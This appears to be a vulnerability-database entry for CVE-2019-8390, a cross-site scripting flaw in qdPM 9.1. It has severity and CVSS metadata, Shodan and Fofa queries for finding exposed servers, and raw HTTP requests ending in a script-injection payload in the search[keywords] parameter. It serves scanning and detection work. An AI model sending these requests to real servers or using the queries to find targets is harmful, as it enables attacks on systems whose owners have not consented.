| Title | qdPM 9.1 - Cross-site Scripting |
|---|---|
| Author | theamanrawat |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor. |
| CVSS Score | 6.1 |
| EPSS Score | 0.02661 |
| CVE ID | CVE-2019-8390 |
| CWE ID | CWE-79 |
| Shodan Query | http.favicon.hash:762074255 |
| Fofa Query | icon_hash=762074255 |
| Tags | cve cve2019 xss qdpm authenticated edb vuln |
qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter.
GET /index.php/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Connection: close
Accept-Encoding: gzip
POST /index.php/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
login%5B_csrf_token%5D=SPithO&login%5Bemail%5D=1HxA5o&login%5Bpassword%5D=sG6EQH&http_referer=
POST /index.php/users HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 85
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
search[keywords]=e"><script>alert(document.domain)</script>&search_by_extrafields[]=9
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-8390.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-8390.pcap
N/AN/A